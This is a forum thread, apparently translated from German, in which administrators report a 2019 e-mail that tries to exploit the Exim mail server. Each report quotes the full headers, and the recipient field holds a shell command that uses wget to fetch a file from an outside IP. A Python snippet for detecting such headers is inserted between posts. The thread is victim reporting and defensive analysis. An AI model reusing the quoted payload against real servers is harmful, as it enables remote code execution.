Thread: Mail server exploit via e-mail

  1. #1
    Senior Member
    Joined
    25.03.2006
    Posts
    1,713

    Default  Mail server exploit via e-mail

    An e-mail, presumably addressed to root@localhost, has just arrived on a server I look after; its source consists of the following:


    header:
    01: Return-Path: <support [at] service.com>
    02: Delivered-To: ???@???.de
    03: Received: by ???.de (Postfix)
    04: ID: [ID filtered]
    05: Delivered-To:
    06: root+${run{x2fbinx2fsht-ctx22wgetx20213.227.155.101x2ftmpx2f[IP-Adresse des angegriffenen
    07: Servers]x22}}@localhost
    08: Received: from service.com (unknown [46.101.19.140])
    09: by ???.de (Postfix) with SMTP ID: [ID filtered]
    10: Tue, 18 Jun 2019 xx:xx:xx +0200 (CEST)
    11: Received: 1
    12: Received: 2
    13: Received: 3
    14: Received: 4
    15: Received: 5
    16: Received: 6
    17: Received: 7
    18: Received: 8
    19: Received: 9
    20: Received: 10
    21: Received: 11
    22: Received: 12
    23: Received: 13
    24: Received: 14
    25: Received: 15
    26: Received: 16
    27: Received: 17
    28: Received: 18
    29: Received: 19
    30: Received: 20
    31: Received: 21
    32: Received: 22
    33: Received: 23
    34: Received: 24
    35: Received: 25
    36: Received: 26
    37: Received: 27
    38: Received: 28
    39: Received: 29
    40: Received: 30
    41: Received: 31

    The interesting part is mainly this code:

    Code:
    root+${run{x2fbinx2fsht-ctx22wgetx20213.227.155.101x2ftmpx2f[IP-Adresse des angegriffenen Servers]x22}}@localhost
    Apparently something is to be fetched from whois: [Link visible only to registered members.] and then executed.

    The exploit is presumably intended for the Exim mail server (which we do not use), if I am reading the Google results correctly (search for x2fbinx2fsht). It could be an attempt to exploit [Link visible only to registered members.].
    Last edited by Gerlach (18.06.2019 at 23:44)

  2. #2
    New Member
    Joined
    19.06.2019
    Posts
    1

    Default

    Hello,

    the same "attack" was carried out against me:


    header:
    01: Return-Path: <support [at] service.com>
    02: Delivered-To: poor [at] spamvictim.tld
    03: Received: from localhost (localhost [127.0.0.1])
    04: by xx.com (Postfix) with ESMTP ID: [ID filtered]
    05: for
    06: <root+${run{x2Fbinx2Fsht-ctx22wgetx20213.227.155.101x2ftmpx2f2.59.132.181x22}}@xx.com>;
    07: Wed, 19 Jun 2019 xx:xx:xx +0200 (CEST)
    08: X-Quarantine-ID: [ID filtered]
    09: X-Virus-Scanned: Debian amavisd-new at xx.com
    10: X-Amavis-Alert: BAD HEADER SECTION, Missing required header field: "Date"
    11: X-Spam-Flag: YES
    12: X-Spam-Score: 12.981
    13: X-Spam-Level: ************
    14: X-Spam-Status: Yes, score=12.981 tagged_above=1 required=4.5
    15: tests=[EMPTY_MESSAGE=2.344, MISSING_DATE=1.396, MISSING_FROM=1,
    16: MISSING_HEADERS=1.207, MISSING_MID=0.14, MISSING_SUBJECT=1.767,
    17: PYZOR_CHECK=1.985, RDNS_NONE=1.274, SPF_HELO_SOFTFAIL=0.896,
    18: SPF_SOFTFAIL=0.972] autolearn=no autolearn_force=no
    19: Subject: ***SPAM***
    20: Received: from xx.com ([127.0.0.1])
    21: by localhost (xx.com [127.0.0.1]) (amavisd-new, port 10024)
    22: with ESMTP ID: [ID filtered]
    23: Received: from service.com (unknown [68.183.4.19])
    24: by xx.com (Postfix) with SMTP ID: [ID filtered]
    25: Wed, 19 Jun 2019 xx:xx:xx +0200 (CEST)
    26: Received: 1
    27: Received: 2
    28: Received: 3
    29: Received: 4
    30: Received: 5
    31: Received: 6
    32: Received: 7
    33: Received: 8
    34: Received: 9
    35: Received: 10
    36: Received: 11
    37: Received: 12
    38: Received: 13
    39: Received: 14
    40: Received: 15
    41: Received: 16
    42: Received: 17
    43: Received: 18
    44: Received: 19
    45: Received: 20
    46: Received: 21
    47: Received: 22
    48: Received: 23
    49: Received: 24
    50: Received: 25
    51: Received: 26
    52: Received: 27
    53: Received: 28
    54: Received: 29
    55: Received: 30
    56: Received: 31
    57: Message-ID: [ID filtered]
    58: Date: Wed, 19 Jun 2019 xx:xx:xx +0200 (CEST)
    59: From: support [at] service.com

    We don't use Exim either. 68.183.4.19 is reachable via the web; was his mail server perhaps hacked?
    Last edited by cmds (19.06.2019 at 14:52) Reason: header tag set
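Both header dumps above carry the same two signals: Exim expansion syntax (${run{...}}) inside the recipient local part, and a long run of numbered Received: lines. The following Python is an added triage example, not code from the thread; it assumes the backslashes that Exim's \xHH escape syntax requires were stripped by the forum rendering, so the constructed sample restores them, and it uses TEST-NET addresses instead of the ones in the thread.

```python
import re

# Constructed sample modelled on the headers quoted in this thread (not copied from
# it). Exim's \xHH escape syntax needs backslashes, which the forum rendering seems
# to have stripped, so they are restored here; IPs are TEST-NET documentation values.
SAMPLE_HEADERS = r"""Return-Path: <support@service.example>
Delivered-To: root+${run{\x2fbin\x2fsh\t-c\x22wget\x20192.0.2.10\x2ftmp\x2f198.51.100.7\x22}}@localhost
Received: from service.example (unknown [203.0.113.5])
    by mx.example (Postfix) with SMTP id [ID filtered]
""" + "\n".join(f"Received: {i}" for i in range(1, 32)) + "\n"

ADDRESS_RE = re.compile(r"([^\s<>,;]+)@([A-Za-z0-9.-]+)")   # local part, domain
ESCAPE_RE = re.compile(r"\\x([0-9A-Fa-f]{2})|\\([tnr])")    # \xHH or \t \n \r

def unfold_headers(raw):
    """Split a raw header block into (name, value) pairs, joining folded lines."""
    headers = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and headers:          # continuation line
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip())
        elif ":" in line:
            name, _, value = line.partition(":")
            headers.append((name.strip(), value.strip()))
    return headers

def decode_exim_escapes(text):
    # Render the escapes so an analyst can read what the expansion would run.
    table = {"t": "\t", "n": "\n", "r": "\r"}
    return ESCAPE_RE.sub(
        lambda m: chr(int(m.group(1), 16)) if m.group(1) else table[m.group(2)], text)

def find_expansion_hits(headers):
    """Flag every address whose local part carries Exim expansion syntax (${...})."""
    hits = []
    for name, value in headers:
        for local, domain in ADDRESS_RE.findall(value):
            if "${" in local:
                hits.append({"header": name, "domain": domain,
                             "decoded": decode_exim_escapes(local)})
    return hits

def triage(raw):
    """Combine the two signals seen in the thread's samples: expansion syntax in a
    recipient local part, and an abnormally long run of Received: headers."""
    headers = unfold_headers(raw)
    hits = find_expansion_hits(headers)
    received = sum(1 for name, _ in headers if name.lower() == "received")
    return {"expansion_hits": hits, "received_count": received,
            "suspicious": bool(hits) or received > 30}
```

Run `triage()` over a header block pulled from the mail log or quarantine; a non-empty `expansion_hits` list is the decisive indicator, the Received: count a supporting one.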

  3. #3
    Urinstein
    Avatar of schara56
    Joined
    03.08.2005
    Location
    at home
    Posts
    10,602

    Default

    Code:
    23: Received: from service.com (unknown [68.183.4.19])
    24:     by xx.com (Postfix) with SMTP ID: [ID filtered]
    25:     Wed, 19 Jun 2019 xx:xx:xx +0200 (CEST)
    Why am I not surprised?
    Code:
    NetRange:       68.183.0.0 - 68.183.255.255
    CIDR:           68.183.0.0/16
    NetName:        DO-13
    NetHandle:      NET-68-183-0-0-1
    Parent:         NET68 (NET-68-0-0-0-0)
    NetType:        Direct Allocation
    OriginAS:       
    Organization:   DigitalOcean, LLC (DO-13)
    RegDate:        2018-09-18
    Updated:        2018-09-13
    Ref:            https://rdap.arin.net/registry/ip/68.183.0.0
    Villains who twirl their mustaches are easy to spot.
    Those who cloak themselves in good deeds are well camouflaged.

    Sokath! His eyes uncovered!
